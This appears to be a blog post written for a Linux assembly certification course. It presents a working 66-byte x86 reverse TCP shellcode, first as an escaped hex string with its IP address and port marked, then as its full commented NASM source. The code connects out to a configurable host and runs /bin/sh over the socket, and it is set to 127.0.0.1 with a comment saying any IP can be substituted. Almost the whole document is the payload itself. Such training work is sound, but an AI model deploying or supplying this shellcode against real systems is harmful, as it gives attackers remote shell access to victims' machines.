Now to create a reasonably well optimized linux Reverse TCP shellcode (66 bytes):
“\x31\xdb\xf7\xe3\x52\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\x68″
“\x7f\x00\x00\x01″ <- IP address 127.0.0.1
“\x66\x68″
“\x0d\xf0″ <- Port 3568
“\x66\x51\xb0\x3f\xcd\x80\x49\x79\xf9\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0″
“\x66\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x31\xc9\x89\xe3″
“\xb0\x0b\xcd\x80″
; Title Linux Reverse Shell TCP Shellcode v0.1 ; Author npn ; License http://creativecommons.org/licenses/by-sa/3.0/ ; Legitimate use and research only ; This program is distributed in the hope that it will be useful, ; but WITHOUT ANY WARRANTY; without even the implied warranty of ; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. global _start section .text _start: ;socket xor ebx, ebx ;zero ebx mul ebx ;zero eax push edx ;0 inc ebx ;socket() push ebx ;1 push byte 0x2 ;2 mov ecx, esp ;move argument ptr to ecx mov al, 0x66 ;syscall socketcall int 0x80 ;socket() ;dup2 xchg ebx, eax ;eax = 2, ebx = fd pop ecx ;2 ;connect stack prepare push 0x0100007f ;only nulls in 127.0.0.1. This can be changed to any IP push word 0xf00d ;3568 push word cx ;af_inet dup2: mov al, 0x3f ;dup2 int 0x80 dec ecx jns dup2 ;connect continue stack prepare mov ecx, esp ;move arg ptr to ecx push byte 0x10 push ecx ;ptr to arg ptr (ecx) push ebx ;fd mov ecx, esp mov al, 0x66 int 0x80 ;execve push edx ;0 push 0x68732f6e ;"n/sh" push 0x69622f2f ;"//bi" xor ecx, ecx mov ebx, esp ;move argument ptr to ebx mov al, 0xb ;execve() int 0x80
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-158